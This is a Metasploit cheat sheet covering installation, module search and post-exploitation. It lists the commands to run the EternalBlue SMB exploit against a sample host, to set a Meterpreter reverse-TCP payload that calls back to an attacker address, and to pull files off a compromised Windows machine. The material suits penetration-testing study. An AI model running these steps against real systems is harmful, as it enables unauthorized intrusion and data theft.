Metasploit

MOCs

• Overview
• Tips and Tricks
• Basic Commands
• Working with Modules
• Exploitation
• Payloads
• Post-Exploitation
• Meterpreter
• Database Integration

Overview

Metasploit is a penetration testing framework that makes hacking simple. It’s an essential tool for many attackers and defenders. It simplifies network discovery and vulnerability verification, increasing the efficiency of attack sequences.

Documentation

Documentation

Tips and Tricks

• Using Resource Scripts: Resource scripts can automate repetitive tasks.

msfconsole -r myscript.rc

• Exporting Data: Export data from the database for reports or further analysis.

db_export -f xml /path/to/save/report.xml

Installation

Metasploit can be installed on various operating systems. On Debian-based systems, you can use:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

Basic Commands

• Starting Metasploit:

msfconsole

• Checking Version:

msfconsole --version

Working with Modules

• Searching for Modules:

search type:exploit platform:windows name:eternalblue

• Using a Module:

use exploit/windows/smb/ms17_010_eternalblue

• Display Module Options:

show options

Exploitation

• Setting Options:

set RHOSTS 192.168.1.100 set LHOST 192.168.1.101

• Running the Exploit:

exploit

or for a background session:

exploit -j

Payloads

• Listing Payloads for a Module:

show payloads

• Setting a Payload:

set payload windows/meterpreter/reverse_tcp

Post-Exploitation

• Gathering System Information:

sysinfo

• Running a Post Module:

use post/multi/recon/local_exploit_suggester set SESSION 1 run

Meterpreter

Meterpreter is a powerful Metasploit payload that provides a wide range of tools for post-exploitation.

• Interacting with a Session:

sessions -i 1

• Downloading Files:

download C:\\Users\\User\\Desktop\\file.txt /tmp

Database Integration

Metasploit can connect to a database to store and manage collected data efficiently.

• Initializing the Database:

msfdb init

• Saving Results to the Database:
  Simply use Metasploit’s commands as usual, and results will be stored in the connected database.